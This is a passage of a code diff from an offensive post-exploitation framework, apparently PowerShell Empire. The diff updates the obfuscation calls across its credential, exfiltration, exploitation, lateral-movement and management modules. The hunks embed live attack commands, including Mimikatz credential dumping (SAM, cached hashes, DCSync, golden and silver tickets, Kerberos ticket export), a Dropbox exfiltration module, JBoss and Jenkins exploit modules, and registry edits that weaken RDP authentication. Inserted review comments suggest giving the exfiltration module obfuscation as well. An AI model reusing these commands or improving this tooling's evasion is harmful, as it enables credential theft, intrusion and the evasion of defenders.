- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/cache.py b/lib/modules/powershell/credentials/mimikatz/cache.py
index 64f2a8d..90b0986 100644
--- a/lib/modules/powershell/credentials/mimikatz/cache.py
+++ b/lib/modules/powershell/credentials/mimikatz/cache.py
@@ -76,6 +76,6 @@ class Module:
 scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/certs.py b/lib/modules/powershell/credentials/mimikatz/certs.py
index bc6cfa7..9bb7f87 100644
--- a/lib/modules/powershell/credentials/mimikatz/certs.py
+++ b/lib/modules/powershell/credentials/mimikatz/certs.py
@@ -73,6 +73,6 @@ class Module:
 # add in the cert dumping command
 scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/command.py b/lib/modules/powershell/credentials/mimikatz/command.py
index 6fe1eaa..c5d8ab1 100644
--- a/lib/modules/powershell/credentials/mimikatz/command.py
+++ b/lib/modules/powershell/credentials/mimikatz/command.py
@@ -79,6 +79,6 @@ class Module:
 scriptEnd = "Invoke-Mimikatz -Command "
 scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync.py b/lib/modules/powershell/credentials/mimikatz/dcsync.py
index c5c9305..4f725b9 100644
--- a/lib/modules/powershell/credentials/mimikatz/dcsync.py
+++ b/lib/modules/powershell/credentials/mimikatz/dcsync.py
@@ -100,6 +100,6 @@ class Module:
 scriptEnd += "\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py
index e622667..cd46e70 100644
--- a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py
+++ b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py
@@ -109,6 +109,6 @@ class Module:
 scriptEnd += "| Out-String;"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py
index eec8576..33d9ea7 100644
--- a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py
+++ b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py
@@ -72,6 +72,6 @@ class Module:
 scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py
index 4370568..3a9da38 100644
--- a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py
+++ b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py
@@ -150,6 +150,6 @@ class Module:
 scriptEnd += " /ptt\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py
index 9bcc167..b8f0d6e 100644
--- a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py
+++ b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py
@@ -78,6 +78,6 @@ class Module:
 if values['Value'] and values['Value'] != '':
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/lsadump.py b/lib/modules/powershell/credentials/mimikatz/lsadump.py
index 94692fb..6fab658 100644
--- a/lib/modules/powershell/credentials/mimikatz/lsadump.py
+++ b/lib/modules/powershell/credentials/mimikatz/lsadump.py
@@ -86,6 +86,6 @@ class Module:
 scriptEnd += "\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/mimitokens.py b/lib/modules/powershell/credentials/mimikatz/mimitokens.py
index 23020b4..afa5f63 100644
--- a/lib/modules/powershell/credentials/mimikatz/mimitokens.py
+++ b/lib/modules/powershell/credentials/mimikatz/mimitokens.py
@@ -137,6 +137,6 @@ class Module:
 scriptEnd += "\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/pth.py b/lib/modules/powershell/credentials/mimikatz/pth.py
index 423969f..6da1a65 100644
--- a/lib/modules/powershell/credentials/mimikatz/pth.py
+++ b/lib/modules/powershell/credentials/mimikatz/pth.py
@@ -126,6 +126,6 @@ class Module:
 scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/purge.py b/lib/modules/powershell/credentials/mimikatz/purge.py
index edac4ea..834d804 100644
--- a/lib/modules/powershell/credentials/mimikatz/purge.py
+++ b/lib/modules/powershell/credentials/mimikatz/purge.py
@@ -74,6 +74,6 @@ class Module:
 # set the purge command
 scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/sam.py b/lib/modules/powershell/credentials/mimikatz/sam.py
index 2d229fb..4672a4c 100644
--- a/lib/modules/powershell/credentials/mimikatz/sam.py
+++ b/lib/modules/powershell/credentials/mimikatz/sam.py
@@ -76,6 +76,6 @@ class Module:
 scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py
index 47187f9..0deb85c 100644
--- a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py
+++ b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py
@@ -162,6 +162,6 @@ class Module:
 scriptEnd += " /ptt\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/mimikatz/trust_keys.py b/lib/modules/powershell/credentials/mimikatz/trust_keys.py
index c216a2a..720cf4e 100644
--- a/lib/modules/powershell/credentials/mimikatz/trust_keys.py
+++ b/lib/modules/powershell/credentials/mimikatz/trust_keys.py
@@ -80,6 +80,6 @@ class Module:
 else:
 scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/powerdump.py b/lib/modules/powershell/credentials/powerdump.py
index 2abe750..caba57a 100644
--- a/lib/modules/powershell/credentials/powerdump.py
+++ b/lib/modules/powershell/credentials/powerdump.py
@@ -70,6 +70,6 @@ class Module:
 scriptEnd = "Invoke-PowerDump"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py
index c7acc1b..ee707d1 100644
--- a/lib/modules/powershell/credentials/sessiongopher.py
+++ b/lib/modules/powershell/credentials/sessiongopher.py
@@ -136,6 +136,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/tokens.py b/lib/modules/powershell/credentials/tokens.py
index f79785f..06761f3 100644
--- a/lib/modules/powershell/credentials/tokens.py
+++ b/lib/modules/powershell/credentials/tokens.py
@@ -155,6 +155,6 @@ class Module:
 if self.options['RevToSelf']['Value'].lower() != "true":
 scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/vault_credential.py b/lib/modules/powershell/credentials/vault_credential.py
index ab983b6..07623da 100644
--- a/lib/modules/powershell/credentials/vault_credential.py
+++ b/lib/modules/powershell/credentials/vault_credential.py
@@ -73,6 +73,6 @@ class Module:
 scriptEnd = "Get-VaultCredential"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/exfiltration/egresscheck.py b/lib/modules/powershell/exfiltration/egresscheck.py
index 02d56e5..902c19d 100644
--- a/lib/modules/powershell/exfiltration/egresscheck.py
+++ b/lib/modules/powershell/exfiltration/egresscheck.py
@@ -119,6 +119,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/exfiltration/exfil_dropbox.py b/lib/modules/powershell/exfiltration/exfil_dropbox.py
index a6b70b0..c1e8482 100644
--- a/lib/modules/powershell/exfiltration/exfil_dropbox.py
+++ b/lib/modules/powershell/exfiltration/exfil_dropbox.py
@@ -84,7 +84,7 @@ class Module:
 if option in self.options:
 self.options[option]['Value'] = value
- def generate(self):
+ def generate(self, obfuscate=False, obfuscationCommand=""):
 script = """
 function Invoke-DropboxUpload {
@@ -137,5 +137,5 @@ Invoke-DropboxUpload """
 script += " -" + str(option)
 else:
 script += " -" + str(option) + " " + str(values['Value'])
-
+
 return script
diff --git a/lib/modules/powershell/exploitation/exploit_jboss.py b/lib/modules/powershell/exploitation/exploit_jboss.py
index 3cf9645..5fe2b02 100644
--- a/lib/modules/powershell/exploitation/exploit_jboss.py
+++ b/lib/modules/powershell/exploitation/exploit_jboss.py
@@ -110,6 +110,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/exploitation/exploit_jenkins.py b/lib/modules/powershell/exploitation/exploit_jenkins.py
index d811188..9d97fd5 100644
--- a/lib/modules/powershell/exploitation/exploit_jenkins.py
+++ b/lib/modules/powershell/exploitation/exploit_jenkins.py
@@ -95,6 +95,6 @@ class Module:
 scriptEnd += " -Cmd " + command
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/inveigh_relay.py b/lib/modules/powershell/lateral_movement/inveigh_relay.py
index 396aa44..93c4982 100644
--- a/lib/modules/powershell/lateral_movement/inveigh_relay.py
+++ b/lib/modules/powershell/lateral_movement/inveigh_relay.py
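Review bot: In exfil_dropbox.py the new signature `def generate(self, obfuscate=False, obfuscationCommand=""):` accepts the obfuscation parameters, but the second hunk of the same file shows the body still ending in a whitespace-only change followed by `return script`, with no `if obfuscate:` branch anywhere in this commit's changes to the file, so a caller that asks for obfuscation silently gets the plain script back, unlike every sibling module changed here. Either add the same guarded call before the return, `if obfuscate:` / `script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)`, or state in the method's docstring that this module does not support obfuscation and why, so the unused parameters are not mistaken for a bug later. The body of generate lies outside both hunks, so this is inferred from the hunks shown. The `-`/`+` pair before `return script` changes only whitespace and could be dropped from the commit.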
@@ -193,6 +193,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py
index ba766c3..76b28d7 100644
--- a/lib/modules/powershell/lateral_movement/invoke_dcom.py
+++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py
@@ -131,6 +131,6 @@ class Module:
 scriptEnd += "| Out-String | %{$_ + \"`n\"};"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py
index cdafed5..519124d 100644
--- a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py
+++ b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py
@@ -185,6 +185,6 @@ class Module:
 scriptEnd += " | Out-String"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_psexec.py b/lib/modules/powershell/lateral_movement/invoke_psexec.py
index ca5fb57..c8f81c1 100644
--- a/lib/modules/powershell/lateral_movement/invoke_psexec.py
+++ b/lib/modules/powershell/lateral_movement/invoke_psexec.py
@@ -146,6 +146,6 @@ class Module:
 scriptEnd += "| Out-String | %{$_ + \"`n\"};"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_psremoting.py b/lib/modules/powershell/lateral_movement/invoke_psremoting.py
index e238d20..2f7879b 100644
--- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py
+++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py
@@ -136,5 +136,5 @@ class Module:
 script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py
index 316cae5..2bfdbd2 100644
--- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py
+++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py
@@ -132,6 +132,6 @@ class Module:
 if password != "":
 scriptEnd += " -Password "+password
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py
index 7cef7e8..0464e0b 100644
--- a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py
+++ b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py
@@ -123,6 +123,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi.py b/lib/modules/powershell/lateral_movement/invoke_wmi.py
index 23e5fb5..db318bc 100644
--- a/lib/modules/powershell/lateral_movement/invoke_wmi.py
+++ b/lib/modules/powershell/lateral_movement/invoke_wmi.py
@@ -145,5 +145,5 @@ class Module:
 script += ";'Invoke-Wmi executed on " +computerNames +"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py
index afbd7b0..f7508a3 100644
--- a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py
+++ b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py
@@ -187,6 +187,6 @@ class Module:
 script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/lateral_movement/jenkins_script_console.py b/lib/modules/powershell/lateral_movement/jenkins_script_console.py
index 16b49e4..cb70a24 100644
--- a/lib/modules/powershell/lateral_movement/jenkins_script_console.py
+++ b/lib/modules/powershell/lateral_movement/jenkins_script_console.py
@@ -121,6 +121,6 @@ class Module:
 scriptEnd += " -Port "+str(self.options['Port']['Value'])
 scriptEnd += " -Cmd \"" + launcher + "\""
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
index cd01e68..3202f92 100644
--- a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
+++ b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
@@ -162,5 +162,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/disable_rdp.py b/lib/modules/powershell/management/disable_rdp.py
index 3cb332a..dd368c7 100644
--- a/lib/modules/powershell/management/disable_rdp.py
+++ b/lib/modules/powershell/management/disable_rdp.py
@@ -55,5 +55,5 @@ class Module:
 # command to enable NLA only if the enable runs successfully
 script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/downgrade_account.py b/lib/modules/powershell/management/downgrade_account.py
index a711b0f..3d385df 100644
--- a/lib/modules/powershell/management/downgrade_account.py
+++ b/lib/modules/powershell/management/downgrade_account.py
@@ -100,5 +100,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/enable_multi_rdp.py b/lib/modules/powershell/management/enable_multi_rdp.py
index 1db6588..b3eb8d1 100644
--- a/lib/modules/powershell/management/enable_multi_rdp.py
+++ b/lib/modules/powershell/management/enable_multi_rdp.py
@@ -73,6 +73,6 @@ class Module:
 scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/enable_rdp.py b/lib/modules/powershell/management/enable_rdp.py
index e7a27a5..4c45a8e 100644
--- a/lib/modules/powershell/management/enable_rdp.py
+++ b/lib/modules/powershell/management/enable_rdp.py
@@ -57,5 +57,5 @@ class Module:
 # command to disable NLA
 script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/get_domain_sid.py b/lib/modules/powershell/management/get_domain_sid.py
index 1c10faa..61786bf 100644
--- a/lib/modules/powershell/management/get_domain_sid.py
+++ b/lib/modules/powershell/management/get_domain_sid.py
@@ -84,5 +84,5 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/honeyhash.py b/lib/modules/powershell/management/honeyhash.py
index 575fd97..899b985 100644
--- a/lib/modules/powershell/management/honeyhash.py
+++ b/lib/modules/powershell/management/honeyhash.py
@@ -90,6 +90,6 @@ class Module:
 if values['Value'] and values['Value'] != '':
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/invoke_script.py b/lib/modules/powershell/management/invoke_script.py
index 1b0b4f4..f828e33 100644
--- a/lib/modules/powershell/management/invoke_script.py
+++ b/lib/modules/powershell/management/invoke_script.py
@@ -77,5 +77,5 @@ class Module:
 script += "%s" %(scriptCmd)
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/lock.py b/lib/modules/powershell/management/lock.py
index 9315a87..83b339d 100644
--- a/lib/modules/powershell/management/lock.py
+++ b/lib/modules/powershell/management/lock.py
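Review bot: In the get_domain_sid hunk the trailing `| Out-String ... completed!` fragment is appended to `scriptEnd`, yet the obfuscation call and the `return` both operate on `script`, and nothing between that append and `return script` folds `scriptEnd` back into `script`, so the fragment appears to be dropped from the generated command. The sibling mailraider hunks (disable_security, get_emailitems and the rest) finish with `script += scriptEnd` before returning, which is likely what was intended here, e.g. `script += scriptEnd` ahead of the `if obfuscate:` line. The function starts outside the hunk, so any earlier use of `scriptEnd` is not visible and this should be confirmed against the full body.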
@@ -87,5 +87,5 @@ Function Invoke-LockWorkStation {
 Invoke-LockWorkStation; "Workstation locked." """
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/logoff.py b/lib/modules/powershell/management/logoff.py
index 4508776..8eef8c3 100644
--- a/lib/modules/powershell/management/logoff.py
+++ b/lib/modules/powershell/management/logoff.py
@@ -62,5 +62,5 @@ class Module:
 else:
 script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/management/mailraider/disable_security.py b/lib/modules/powershell/management/mailraider/disable_security.py
index 7bf6639..ebb3d86 100644
--- a/lib/modules/powershell/management/mailraider/disable_security.py
+++ b/lib/modules/powershell/management/mailraider/disable_security.py
@@ -110,6 +110,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/management/mailraider/get_emailitems.py b/lib/modules/powershell/management/mailraider/get_emailitems.py
index d7229cf..8a9f219 100644
--- a/lib/modules/powershell/management/mailraider/get_emailitems.py
+++ b/lib/modules/powershell/management/mailraider/get_emailitems.py
@@ -87,6 +87,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
